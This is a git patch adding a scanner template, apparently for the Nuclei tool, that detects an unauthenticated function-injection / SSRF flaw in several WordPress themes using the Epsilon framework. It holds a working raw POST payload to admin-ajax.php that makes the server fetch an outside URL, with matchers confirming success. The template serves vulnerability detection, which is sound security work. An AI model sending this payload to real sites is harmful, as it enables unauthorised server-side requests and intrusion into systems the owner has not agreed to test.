From 59e24ab8a7ece3fc87fbeeb56c066a1dbb7612f5 Mon Sep 17 00:00:00 2001
From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com>
Date: Sat, 26 Jun 2021 13:38:26 +0530
Subject: [PATCH] Create multiple-theme-ssrf.yaml

---
 .../wordpress/multiple-theme-ssrf.yaml        | 30 +++++++++++++++++++
 1 file changed, 30 insertions(+)
 create mode 100644 vulnerabilities/wordpress/multiple-theme-ssrf.yaml

diff --git a/vulnerabilities/wordpress/multiple-theme-ssrf.yaml b/vulnerabilities/wordpress/multiple-theme-ssrf.yaml
new file mode 100644
index 0000000000..ddc5a6a584
--- /dev/null
+++ b/vulnerabilities/wordpress/multiple-theme-ssrf.yaml
@@ -0,0 +1,30 @@
+id: multiple-theme-ssrf
+info:
+  name: Multiple Themes - Unauthenticated Function Injection
+  author: madrobot
+  severity: high
+  tags: wordpress,rce,ssrf
+
+requests:
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php?action=action_name HTTP/1.1
+        Host: {{Hostname}}
+        Accept-Language: en
+        Accept-Encoding: gzip, deflate
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        Content-Length: 158
+        Connection: close
+
+        action=epsilon_framework_ajax_action&args%5Baction%5D%5B%5D=Requests&args%5Baction%5D%5B%5D=request_multiple&args%5Bargs%5D%5B0%5D%5Burl%5D=http://example.com
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Example Domain"
+          - "protocol_version"
+        part: body
+      - type: status
+        status:
+          - 200